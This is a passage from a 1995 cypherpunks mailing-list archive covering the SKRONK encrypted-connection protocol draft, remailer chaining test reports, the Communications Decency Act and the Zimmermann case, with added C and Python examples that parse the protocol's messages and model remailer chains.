        199.170.88.5    destination_ip_address
   udp header:
        1066            source_port
        skronk          destination_port (number not assigned yet)
   body:
        0x1F1206FB      skronk_magic
        2001            skronk_serial
        1               version
        '?'             action (SKRONK_MAP_REQUEST)
        "finger         comment (for paranoid net admins)
         skronk@yak.net
         for info"

Map Request Reply:

   ip header:
        UDP             protocol
        199.170.88.5    source_ip_address
        128.32.43.52    destination_ip_address
   udp header:
        skronk          source_port (number not assigned yet)
        1066            destination_port
   body:
        0x1F1206FB      skronk_magic
        2001            skronk_serial (copied from request)
        1               version
        '.'             action (SKRONK_MAP_REPLY)
        3600            ttl (one hour)
   map list:
        23, 423,        /* skronked TELNET on port 423 */
        25, 425,        /* skronked SMTP on port 425 */
        70, 470,        /* skronked GOPHER on port 470 */
        80, 480,        /* skronked HTTP on port 480 */
        514, 914,       /* skronked shell on port 914 */
        750, 350,       /* skronked shell on port 350 */
        6000, 6400,     /* skronked X11 on port 6400 */
        0               /* zero marks end of list */
                        /* ... assume other services 
                                cannot be skronked */

/* 
 * Notice the skronked ports on this host (199.170.88.5)
 * have been allocated by the system administrator
 * using a simple (but arbitrary) rule: 
 *
 *     add 400 to the normal number, unless this has
 *     problems (like it would bring a less-than-1024
 *     port number to be greater-than-1024), in which
 *     case subtract 400.
 *
 * I propose this rule as a default, since it does not seem
 * to collide with common port numbers, but because we 
 * have and always use the skronk map daemon, each site
 * could pick different numbers.
 */


---- THE UDP PROTOCOL ENDS HERE ----


SKRONK PER-CONNECTION NEGOTIATION

/* 
 * The current skronk prototype temporarily works on 
 * a simpler negotiation scheme, but below is the
 * intended scheme.
 */

/*
 * Good questions:  
 * 1.  Would telnet-style negotiations be better?
 *
 *      I conclude not:
 *      -- this offers options to be combined at once
 *      -- this does fewer passes from server to client
 *      -- this uses ASCII names rather than numbers
 *              for options, which allows liberal 
 *              experimentation with "x-" names.
 *
 * 2. Do we need some escape-character & character-stuffing 
 *    to re-open negotiations?
 *
 *      Maybe... but flow of control probably never returns 
 *      to the skronk layers with any such requests, so let's
 *      let some escape-octet (with escape-octet-stuffing) 
 *      option for return-to-negotiation be a negotiated
 *      option that can be added later.
 */

The skronk library does a negotiation at the beginning of each TCP
connection, after "connect()" and "accept()" rendezvous, before
returning flow of control to the application.  This negotiation is
transparent to the application, but may be configured with skronk
configuration files or environment variables.

These negotiations should not be confused with other negotiations
specific to the program, such as TELNET negotiations, which would occur
later, once control is returned to the application.


/*
 *  I should first define 'negotiation line', 'acceptance line', 
 *    and 'disconnect' to describe the following...
 */


When the connection is made, the server writes a line of 10 to 999
octets, composed of ASCII characters, terminating with CRLF, to the
client.  This line must begin with the eight characters

        'S'  'K'  'R'  SPACE  h  t  o  SPACE

where h, t, and o are three decimal digits '0'-'9' (hundreds, tens, and
ones places), with a leading zero in the hundreds place if required,
specifying the length of this line, counting the CRLF at the end.  Thus
the minimum length of the line is 10.  The reason for putting the
length of the line in the front is so that the client can first read 8
characters, and then read the rest of the line, but not try to read any
characters beyond that size.

After the "SKR hto " follow zero or more words of the regexp form

        [A-Za-z0-9+][A-Za-z0-9/.+-]*

separated by one or more SPACE characters.  Case matters.  These words
specify protocols, and should be registered with strick@yak.net, or begin
with "x-" for experimental protocols.

By sending this line, the server volunteers to serve this protocol
skronked with any of the listed protocols.  The server should list the
protocols in order of preference, its favored protocols first.

The client reads this line, chooses one (or more) protocols, and
responds with a similar line, listing only the protocol(s) that it
chooses to use, in a specific "stacking" order, from the first protocol
applied to the last.  For instance, if it chooses "gzip" compression
followed by "des" encryption, it should list them in the order "gzip
des".  Some protocol choices may not be compatible, and some protocol
choices may not have stacking order; this will have to be described
when the protocols are defined.

If the client does not like any of the choices offered, it may hang up
the connection, instead of replying with a line.

If the server accepts the protocol the client chose, it responds with 8
characters

        'S'  'K'  'R'  SPACE  'O'  'K'  CR  LF

If not, it may either disconnect the connection, or it may send another
initial negotiation line, which should be different from the initial
line offered (probably with fewer options for the client to choose).


If the negotiation is accepted, what happens next depends on the
accepted protocols, and on the actions of the rest of the program.
Typically a selected protocol may have to do some more negotiation or
trading of data before control is returned to the application.  And
later reads and writes from the application to the skronked socket may
be intercepted and frobbed.


PRIMORDIAL PROTOCOLS

For stream encryption:

	/* needs work */

	A simple initial protocol named "dh/idea.1".

	Use Diffie-Hellman key exchange from RSAREF 2.0.
	Let the server declare the R_DH_PARAMS, and the size of things.
	Use IDEA encryption in CFB mode from PGP 2.6.
	No authentication -- susceptible to man-in-the-middle 
	attacks at connection time.


For authentication:

	/* needs lots of work */

	A simple initial protocol named "auth-pgp.1"

	Use PGP public keys and certificates to create
	a web of trust and thereby authenticate hosts.

	Can be combined with "dh/idea.1" or used separately. 

	(This probably requires having secret key pass phrases
	on multiuser machines, so it's one small step forward.)



--------------------------------

END $Header: /x/nepal/x/yak/strick/work/skronk-write/RCS/skronk.proto,v 1.3 95/02/05 01:18:49 strick Exp Locker: strick $
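
The skronk map reply handling described in the UDP section of the post above, as an added example that is not part of the post or of the skronk library: a client-side parser that treats the datagram as untrusted, checks magic, serial and action, and walks the port map with bounds checks. It uses fixed-width types because "unsigned long" is not 4 octets on every platform; the function names, error codes and the MAX_PAIRS cap are assumptions, and the sample reply is constructed from the post's example values.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SKRONK_MAGIC        0x1F1206FBu
#define SKRONK_VERSION      0x0101
#define SKRONK_MAP_RESPONSE 46   /* '.' */
#define SKRONK_MAP_NACK     33   /* '!' */
#define SKRONK_HDR_LEN      16   /* magic 4, serial 4, version 2, action 2, ttl 4 */
#define MAX_PAIRS           64   /* assumption: local cap on map entries */

enum { SK_OK = 0, SK_SHORT = -1, SK_BAD_MAGIC = -2, SK_BAD_SERIAL = -3,
       SK_NACK = -4, SK_BAD_ACTION = -5, SK_BAD_MAP = -6 };

struct map_pair  { uint16_t normal, skronked; };
struct map_reply {
    uint32_t serial, ttl;
    uint16_t version, action;
    size_t   npairs;
    struct map_pair pairs[MAX_PAIRS];
};

/* Big-endian ("network" order) readers and writers on raw octets. */
static uint16_t rd16(const unsigned char *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const unsigned char *p) { return ((uint32_t)rd16(p) << 16) | rd16(p + 2); }
static void wr16(unsigned char *p, uint16_t v) { p[0] = (unsigned char)(v >> 8); p[1] = (unsigned char)v; }
static void wr32(unsigned char *p, uint32_t v) { wr16(p, (uint16_t)(v >> 16)); wr16(p + 2, (uint16_t)v); }

/* Parse one reply datagram. want_serial is the serial of the request we
 * sent; a reply carrying any other serial is rejected, not cached. */
int skronk_parse_reply(const unsigned char *buf, size_t len,
                       uint32_t want_serial, struct map_reply *out)
{
    size_t off = SKRONK_HDR_LEN;

    out->npairs = 0;
    if (len < SKRONK_HDR_LEN)       return SK_SHORT;
    if (rd32(buf) != SKRONK_MAGIC)  return SK_BAD_MAGIC;
    out->serial  = rd32(buf + 4);
    out->version = rd16(buf + 8);
    out->action  = rd16(buf + 10);
    out->ttl     = rd32(buf + 12);
    if (out->serial != want_serial)         return SK_BAD_SERIAL;
    if (out->action == SKRONK_MAP_NACK)     return SK_NACK;
    if (out->action != SKRONK_MAP_RESPONSE) return SK_BAD_ACTION;

    for (;;) {
        uint16_t normal, skronked;
        if (len - off < 2) return SK_BAD_MAP;      /* ran out before the 0 */
        normal = rd16(buf + off); off += 2;
        if (normal == 0) return SK_OK;             /* zero marks end of list */
        if (len - off < 2) return SK_BAD_MAP;      /* half a pair */
        skronked = rd16(buf + off); off += 2;
        if (skronked == 0 || out->npairs == MAX_PAIRS) return SK_BAD_MAP;
        out->pairs[out->npairs].normal = normal;
        out->pairs[out->npairs].skronked = skronked;
        out->npairs++;
    }
}

/* Skronked port for a normal port, or 0 if the service is not listed. */
uint16_t skronk_lookup(const struct map_reply *r, uint16_t normal)
{
    for (size_t i = 0; i < r->npairs; i++)
        if (r->pairs[i].normal == normal) return r->pairs[i].skronked;
    return 0;
}

/* Constructed sample: the post's example reply (serial 2001, ttl 3600).
 * buf must hold at least 46 octets; returns the datagram length. */
size_t skronk_sample_reply(unsigned char *buf)
{
    static const uint16_t map[] = { 23, 423, 25, 425, 70, 470, 80, 480,
                                    514, 914, 750, 350, 6000, 6400, 0 };
    size_t off = SKRONK_HDR_LEN;

    wr32(buf, SKRONK_MAGIC);
    wr32(buf + 4, 2001);
    wr16(buf + 8, SKRONK_VERSION);
    wr16(buf + 10, SKRONK_MAP_RESPONSE);
    wr32(buf + 12, 3600);
    for (size_t i = 0; i < sizeof map / sizeof map[0]; i++, off += 2)
        wr16(buf + off, map[i]);
    return off;
}

int main(void)
{
    unsigned char buf[64];
    struct map_reply r;
    size_t n = skronk_sample_reply(buf);
    int rc = skronk_parse_reply(buf, n, 2001, &r);

    printf("rc=%d pairs=%zu ttl=%lu telnet->%u\n", rc, r.npairs,
           (unsigned long)r.ttl, (unsigned)skronk_lookup(&r, 23));
    return rc == SK_OK ? 0 : 1;
}
```
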

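
The per-connection negotiation line from the same post ("SKR hto " followed by protocol words and CRLF), as an added example that is not the skronk library's code: a strict parser for the offer line and a client that answers only if every protocol its local policy requires was offered, and otherwise signals that the caller should hang up. The function names, the word and count caps, and the policy of requiring "auth-pgp.1" together with "dh/idea.1" are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SKR_MIN_LINE  10    /* "SKR hto " plus CRLF */
#define SKR_MAX_LINE  999   /* three decimal digits */
#define SKR_MAX_WORDS 16    /* assumption: local cap on offered words */
#define SKR_WORD_CAP  32    /* assumption: local cap on word length + NUL */

/* Character classes of the word regexp [A-Za-z0-9+][A-Za-z0-9/.+-]* */
static int is_first(int c)
{
    return (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
           (c >= '0' && c <= '9') || c == '+';
}
static int is_rest(int c) { return is_first(c) || c == '/' || c == '.' || c == '-'; }

/* Declared line length from the first 8 octets, or -1 if malformed.
 * A reader calls this first, then reads exactly (length - 8) more octets. */
int skr_prefix_len(const char *p)
{
    int n;
    if (memcmp(p, "SKR ", 4) != 0 || p[7] != ' ') return -1;
    for (int i = 4; i < 7; i++)
        if (p[i] < '0' || p[i] > '9') return -1;
    n = (p[4] - '0') * 100 + (p[5] - '0') * 10 + (p[6] - '0');
    return n >= SKR_MIN_LINE ? n : -1;
}

/* Parse a complete line of len octets. Returns the word count, or -1 if
 * the length prefix, CRLF terminator or any word is invalid. */
int skr_parse_line(const char *buf, size_t len,
                   char words[][SKR_WORD_CAP], size_t max)
{
    size_t i = 8, end, count = 0;

    if (len < SKR_MIN_LINE || skr_prefix_len(buf) != (int)len) return -1;
    if (buf[len - 2] != '\r' || buf[len - 1] != '\n') return -1;
    end = len - 2;
    while (i < end) {
        size_t start;
        if (buf[i] == ' ') { i++; continue; }
        if (!is_first((unsigned char)buf[i])) return -1;
        start = i++;
        while (i < end && is_rest((unsigned char)buf[i])) i++;
        if (i < end && buf[i] != ' ') return -1;        /* illegal octet */
        if (i - start >= SKR_WORD_CAP || count == max) return -1;
        memcpy(words[count], buf + start, i - start);
        words[count++][i - start] = '\0';
    }
    return (int)count;
}

/* Build "SKR hto w1 w2 ...\r\n" with the length computed for the caller.
 * Returns the line length, or -1 if it would not fit. */
int skr_build_line(char *out, size_t cap, const char *const *w, size_t n)
{
    size_t total = 8 + 2, off;

    for (size_t i = 0; i < n; i++)
        total += strlen(w[i]) + (i ? 1 : 0);
    if (total > SKR_MAX_LINE || total + 1 > cap) return -1;
    off = (size_t)snprintf(out, cap, "SKR %03zu ", total);
    for (size_t i = 0; i < n; i++) {
        if (i) out[off++] = ' ';
        memcpy(out + off, w[i], strlen(w[i]));
        off += strlen(w[i]);
    }
    memcpy(out + off, "\r\n", 3);                       /* CRLF and NUL */
    return (int)total;
}

/* Client side: reply with the required stack, in the client's stacking
 * order, only if the server offered every required word. -1 means the
 * caller should hang up instead of replying. */
int skr_choose(const char *offer, size_t offer_len,
               const char *const *required, size_t nreq,
               char *reply, size_t cap)
{
    char words[SKR_MAX_WORDS][SKR_WORD_CAP];
    int n = skr_parse_line(offer, offer_len, words, SKR_MAX_WORDS);

    if (n < 0) return -1;
    for (size_t r = 0; r < nreq; r++) {
        int found = 0;
        for (int i = 0; i < n; i++)
            if (strcmp(words[i], required[r]) == 0) found = 1;
        if (!found) return -1;
    }
    return skr_build_line(reply, cap, required, nreq);
}

int main(void)
{
    /* Constructed offer line; the words are protocol names from the post. */
    const char offer[] = "SKR 035 auth-pgp.1 dh/idea.1 gzip\r\n";
    const char *const policy[] = { "auth-pgp.1", "dh/idea.1" };
    char reply[64];

    if (skr_choose(offer, strlen(offer), policy, 2, reply, sizeof reply) < 0)
        return 1;
    fputs(reply, stdout);
    return 0;
}
```
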



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Sun, 5 Feb 95 08:50:30 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Here we go again...
Message-ID: <Chameleon.4.01.950205084831.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain



+---------------------------------------------------------+
 ##### #     #     #          #     #     ##### ####  #####
 #     ##   ##    # #        # #    #     #     #   #   #
 ###   # # # #   #   #      #   #   #     ###   ####    #
 #     #  #  #  #######    #######  #     #     #  #    #
 ##### #     # #       #  #       # ##### ##### #   #   #
+---------------------------------------------------------+
                       -> EMA ALERT <-
            News For and About the Members of the
               ELECTRONIC MESSAGING ASSOCIATION
============================================================
                February 3, 1995 -- Number 18
<---------------------------------------------------------->
                  ***** SPECIAL ALERT *****
 - Congress to consider making all system operators liable
   for messaging content.  Bill would force employers to
   monitor message content.              ACTION NEEDED NOW!
<---------------------------------------------------------->

UNREASONABLE NETWORK POLICING PROPOSED
   Yesterday, Senator Jim Exon (D-NE) introduced S.314, the
Communications Decency Act of 1995, in the United States
Senate.  In an effort to stamp out digital pornography, it
makes all telecommunications providers doing business in the
United States (from the telephone companies all the way down
to offices that use LANs) liable for the content of anything
sent over their networks.  To avoid the possibility of tens
of thousands of dollars in fines and up to two years in
jail, business owners would be forced to police their
networks and monitor in advance all messages sent over them.

WITHOUT ACTION - COULD BE LAW IN MONTHS
   This bill is substantially the same as the one he put
forward last year.  He will offer it as an amendment to the
pending telecommunications deregulation legislation in the
U.S. Senate, which is expected to be enacted by July.  Last
year, his amendment was adopted even though many thought it
hastily drafted and poorly thought out.  Fortunately, the
telecommunications deregulation legislation died.  This
year, a more conservative U.S. Congress may be even more
reluctant to challenge a "morality" amendment; and its
legislative vehicle, the telecommunications deregulation
legislation, stands a much better chance of passage this
year.

ACTION NEEDED NOW
   Action by the business community is needed now.  Please
notify your corporate government affairs office and/or your
legal counsel.  This measure could be adopted as an
amendment to the telecommunications bill IN A MATTER OF
WEEKS (or potentially added to any legislation pending on
the U.S. Senate floor), if business does not mobilize
against it.  S.314 will not stop digital pornography, but it
could devastate the messaging business.  If you are
interested in further information or are able to participate
in lobbying efforts over the next few weeks, contact Sarah
Reardon at EMA (see below).

------------------------------------------------------------
EMA ALERT is published and copyrighted (1995) by the
Electronic Messaging Association.  Permission to reproduce
and/or redistribute with attribution is hereby given to all
EMA members.  For more information about anything in EMA
ALERT, contact EMA via e-mail - use either X.400 (S=info;
O=ema; A=mci; C=us) or Internet (info@ema.org) address,
facsimile (1-703-524-5558), or telephone (1-703-524-5550).
Any EMA staff member can be addressed directly via e-mail by
using, for X.400, G=<firstname>; S=<lastname>; O=ema; A=mci;
C=us, and, for Internet, <firstinitial><lastname>@ema.org.
EMA's postal address is 1655 N. Fort Myer Dr. #850,
Arlington, VA 22209 USA.


==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Sun, 5 Feb 95 09:55:12 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <Pine.HPP.3.91.950205095632.27089A-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have a list of current remailers?


/sy/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 5 Feb 95 07:05:34 PST
To: cypherpunks@toad.com
Subject: NYT on Tera and UUNet
Message-ID: <199502051504.KAA09875@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


John Markoff writes today on Tera Computer's supercomputer 
prayers.


For email copy (13k) send blank message to <jya@pipeline.com> 
with subject:  TER_nup


And, Laurie Flynn writes on UUNet's tender tap by Microsoft.


For copy (13k), same, with subject:  UUN_zzz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@tower.techwood.org (Anonymous)
Date: Sun, 5 Feb 95 10:02:38 PST
To: cypherpunks@toad.com
Subject: BROKEN REMAILERS
Message-ID: <199502051758.MAA02142@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have tested remailers and their PGP keys over some time now and this is
what I have found:	

MIXMASTER is a great, fast and reliable remailer but you can't PGP with it.

REMAILER@NATELY.UCSD.EDU is just as fast and reliable (same guy) and you 
can use PGP, but a few weeks ago it started acting really funny: It will
forward any ATTACHED files, but it will only read the first commandline
of a PGP block that has been pgp'ed with Nately's public key.  In other
words, if you wrap layers of chained remailers inside each other, you 
will now have to have NATELY as the *last* link in your chain as it will
otherwise discard the rest of the block. Alternatively you can have the
chain as a series of attached files.

USURA is really quick too and has lately been reliable. But it has always
suffered from the same problem as Nately, namely that it will truncate all
of the remaining lines in a PGP message encrypted with its own public key,
thus making it impossible to chain effectively.  It will read the first 
command only.  It DOES forward all attached files, however (by which I 
mean text that has been tagged on OUTSIDE of the pgp block encrypted
to Usura).

EXTROPIA and VOX suffer from the exact *opposite* problem.  They forward
the entire inner remains of a pgp block untouched after having only read
the first commands to them.  But they both ignore and discard all text
outside that first initial pgp block encrypted with their public keys.
This means that you cannot send a message with multiple pgp's through
either of them: because any attached parts get thrown away.  
As a practical application, it means that you can't use either of these
two as part of your nym@alpha.c2.org setup, sadly...
BTW, with VOX you will have to add the ::Encrypted: PGP bit whereas you
don't have to do that with Extropia (or with alias@alpha.c2.org for that
matter).

REBMA is ideal in that it does not touch your message: You can use *both*
attached files and "wheels within wheels" where you have layers of pgp'ed
remailer instructions hidden inside one another. The main problem with 
REBMA is that she has been down a bit lately and even when she is not down,
you have to wait ages: 1 or 2 days, sometimes even more.

The best remailer, IMO, is HAL@ALUMNI.CALTECH.EDU which operates in tandem 
with HFINNEY@SHELL.PORTAL.COM: Both are fast and very reliable.  Moreover,
neither will throw away attached messages (like Vox and Extropia do) nor
throw away the other loops of an inner-encrypted pgp reply block (like
Usura and now, lately, unfortunately, also Nately do). Very versatile!

I used to like JPUNIX too.  Now it seems HOMER@RAHUL.NET is a winner,
I don't know if he will stay reliable, but he sure is fast.  In terms
of PGP, he is just as good as HAL/HFINNEY.  Likewise, TOWER: Both work!

The DESERT remailer is sometimes fast, sometimes slow. I have a feeling it waits
until it can send out stuff in batches. So sometimes you have to wait a day
or so.  It works with Anon-To: last I checked, if I recall correctly.

That's the extent of my playing around. I would appreciate corrections
and help, especially information with some of the remailers I have not 
mentioned here.  I have not played with Q or with FLAME, for instance. 

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

.Signature field left blank
(or it wouldn't be anonymous, would it?)

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzUR0CoZzwIn1bdtAQGoHQF/ep/uxpNHaCX4JUoETqULLax8Q0vu6VrY
Jh1P/ey2QrWi1TKWky3/SJ967S+xoqg0
=gEZ3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 5 Feb 95 13:00:32 PST
To: cypherpunks@toad.com
Subject: Zimmermann charges dropped?
Message-ID: <199502052059.MAA08492@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Apologies if this has been discussed and I somehow missed it. I just
got back from Monte Carlo last night and have briefly scanned the 500+
accumulated messages, not seeing this item mentioned.

Drew Taubman (sp?), the new Executive Director of the EFF, told me
that in recent days the grand jury meeting in the PRZ case did in fact
decide to go forward with the indictment.

However, says Drew, the judge in the case dismissed the charges after
looking at them, apparently in about an hour or so. He cited the
absence of relevant law in the case (as I understand it, the argument
being that there is no law against what PRZ did, i.e., "make code
available" in such a way that _others_ might then access it and
perhaps then illegally export it (assuming such export might be later
proved to be illegal)).

Drew went on to tell me that the judge said there would need to be a
relevant law on this, and that Senator Leahy and his staff (recall
their involvement in the Digital Telephony Bill) are already at work
drafting such legislation.

I haven't seen mention of this, so I thought I'd mention it here. I
could of course try to get confirmation first from Phil, but he is
notoriously hard to reach in e-mail, ironically, and this seems
sufficiently important to mention to the list.

And if you can't trust the EFF, who _can_ you trust? (Don't answer
that.)

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nobody@eniac.ac.siue.edu (Anonymous)
Date: Sun, 5 Feb 95 10:03:55 PST
To: cypherpunks@toad.com
Subject: BROKEN REMAILERS
Message-ID: <199502051800.NAA02153@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here's a bug report on some remailers that won't work in a nested chain
when it is encrypted.
First, a look at how a chain is supposed to work.  Three good ones, chained
like:
1) Tower->Alumni->Homer. OK
2) Homer->Tower->Alumni. OK
3) Homer->Alumni->Tower. OK

This was in a test of the new Tower remailer. In other words, 
it doesn't matter if Tower is at the beginning, middle or end of a chain.
The message will reach its intended destination. (In fact, quite fast).

But some other remailers fuck up when they become part of a nested, encrypted
chain.  One of those? The Syrinx remailer.  Here are the test results:
1) Syrinx->alumni->Homer. NO
2) Homer->syrinx->alumni. NO
3) Homer->alumni->syrinx. OK

The third one came back to me in under an hour. No reply from number 1 and 2.
I don't know why it doesn't work but it doesn't! Maybe one explanation is
that as Syrinx gets a message it sees the :: Encrypted: PGP and then
decodes it using its key (as it should), but then in the decrypted message
it sees another :: Encrypted: PGP and attempts to decode it again using its
key (again), fails (of course) and aborts. This to me is the only explanation
as to this strange behaviour. It is a serious problem and I do think that
it should be brought to the attention of everybody. Now I haven't tested
all of the remailers so I don't really know which one also will fail the
test. In that test I chose Homer and Alumni because I know that these 2
are reliable and don't care in what order they are in a chain. I also always
send the same test message; it reads:

This is a test
line1
line2
line3
line4
Sent <TIME and DATE>
to #1->#2->#3

So it's easy to do. And when I get a reply I know which one (1, 2 or 3)
worked, since the path is in the message. Now I know that syrinx doesn't
work. So I add it to my list of those remailers that failed the test.

Also on this list are:
* Nately
and 
* Usura
as they both share the same properties as Syrinx: The chained message gets
home ONLY if Syrinx / Usura / Nately is the _last_ link of the chain.
(Nately *used* to be as good as Homer, Tower, Hal and Portal, but not
anymore. Around Christmas, it changed its performance. Maybe the operator
tinkered - don't know what he did, but he made it worse.)

Two other remailers failing our tests, but for other reasons, are:
* Extropia
and 
* Vox.
Neither forwards attached files. In other words, anything outside of the 
original encrypted block gets sent on.  This makes both of them useless
for reply blocks, for instance.


- --
anon
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzUSGCoZzwIn1bdtAQH3IgF9FIUMOTd6rsihkaXUCKn4w14qTtOEfjcD
sXFPB/62K6NQZCuHTUPBDa30jh2c8sJY
=6tBU
-----END PGP SIGNATURE-----
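
Added example, not part of either archived post and not any remailer's actual code: a toy Python model of the nested chains that both BROKEN REMAILERS reports describe. It reproduces the second report's guess about Syrinx (a hop retries decryption of the inner `:: Encrypted: PGP` layer with its own key and aborts) and the Extropia/Vox behaviour from the first report (text outside the encrypted block is discarded); the base64 envelope standing in for PGP, the mode names and the `recipient` address are assumptions.

```python
"""Toy model of nested remailer chains. PGP is replaced by a labelled base64
envelope, so this shows message handling only, not cryptography."""
import base64

BEGIN, END = "-----BEGIN TOY MESSAGE-----", "-----END TOY MESSAGE-----"
MARKER = "::\nEncrypted: PGP\n\n"
# Constructed chain orders mirroring the three tests in the posts;
# "X" is the remailer under test.
ORDERS = [["X", "alumni", "homer"],
          ["homer", "X", "alumni"],
          ["homer", "alumni", "X"]]


def seal(recipient, plaintext):
    """Stand-in for 'encrypt to the recipient's public key' (assumption)."""
    blob = base64.b64encode(plaintext.encode()).decode()
    return f"{MARKER}{BEGIN}\nTo: {recipient}\n{blob}\n{END}\n"


def unseal(me, message):
    """Return (decrypted text, text outside the block); ValueError on failure."""
    if not message.startswith(MARKER + BEGIN):
        raise ValueError(f"{me}: no encrypted block to process")
    rest = message[len(MARKER + BEGIN) + 1:]
    block, _, trailing = rest.partition(END + "\n")
    to_line, blob = block.strip().split("\n", 1)
    if to_line != f"To: {me}":
        raise ValueError(f"{me}: block is encrypted to another key")
    return base64.b64decode(blob).decode(), trailing


def build_chain(hops, recipient, body=""):
    """Wrap body in one layer per hop; the outermost layer is for hops[0]."""
    payload = body
    for hop, nxt in reversed(list(zip(hops, hops[1:] + [recipient]))):
        payload = seal(hop, f"::\nAnon-To: {nxt}\n\n{payload}")
    return payload


def process(name, mode, message):
    """One hop. Modes (hypothetical labels):
    good          - peel own layer, forward inner body plus outside text
    redecrypt     - also tries its own key on a nested layer, then aborts
    drop_trailing - forwards the inner body but discards outside text"""
    inner, trailing = unseal(name, message)
    header, _, body = inner.partition("\n\n")
    next_addr = header.split("Anon-To: ", 1)[1].strip()
    if mode == "redecrypt" and body.startswith(MARKER):
        unseal(name, body)  # wrong key: raises, so the message is lost here
    if mode == "drop_trailing":
        trailing = ""
    return next_addr, body + trailing


def deliver(hops, recipient, modes, body="", attached=""):
    """Send through the chain; return what the recipient gets, or None."""
    message = build_chain(hops, recipient, body) + attached
    addr = hops[0]
    while addr != recipient:
        try:
            addr, message = process(addr, modes.get(addr, "good"), message)
        except ValueError:
            return None
    return message


def position_results(name, mode, attached=""):
    """Run the first/middle/last position test for one remailer and mode."""
    results = []
    for order in ORDERS:
        hops = [name if hop == "X" else hop for hop in order]
        results.append(deliver(hops, "recipient", {name: mode},
                               "This is a test\n", attached))
    return results


if __name__ == "__main__":
    for name, mode, attached in [("tower", "good", ""),
                                 ("syrinx", "redecrypt", ""),
                                 ("vox", "drop_trailing", "attached text\n")]:
        print(name, mode, position_results(name, mode, attached))
```

In this model the `redecrypt` hop delivers only when it is the last link, matching the NO/NO/OK pattern reported for Syrinx, while a `drop_trailing` hop loses the attached text at any position.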




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Sun, 5 Feb 95 11:02:38 PST
To: strick@yak.net (strick at The Yak)
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <199502051002.CAA01090@nando.yak.net>
Message-ID: <m0rb7Za-0009tFC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


...
> /* "Skronk" is a musical term, for a new-york-ish free-jazz 
>  *   massively saxaphonish kind of music, e.g. John Zorn  
>  */
> 
> 
> ---- THE UDP PROTOCOL BEGINS HERE ----
> 
> THE SKRONK MAP DAEMON
> 
> A skronk map daemon is a UDP service that tells what skronked services are
> available from a site, and what alternate TCP server port numbers they
> use.

UDP won't get through most firewalls.

Build in support for non-transparent firewalls (ie: telnet gatekeeper,
c sys port).

Handle getting access to skronked protocols by using the standard telnet
port and logging in as 'skronk' to get access to a service multiplexer.

Just some suggestions to deal with realities of availability.

...

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewall/WWW srvrs ICBM/GPS: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W wrk
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.28Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sun, 5 Feb 95 12:25:05 PST
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <m0rb7Za-0009tFC@sdwsys>
Message-ID: <199502052024.PAA21302@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Stephen D Williams wrote:

| > THE SKRONK MAP DAEMON
| > 
| > A skronk map daemon is a UDP service that tells what skronked services are
| > available from a site, and what alternate TCP server port numbers they
| > use.
| 
| UDP won't get through most firewalls.
| 
| Build in support for non-transparent firewalls (ie: telnet gatekeeper,
| c sys port).
| 
| Handle getting access to skronked protocols by using the standard telnet
| port and logging in as 'skronk' to get access to a service multiplexer.
| 
| Just some suggestions to deal with realities of availability.

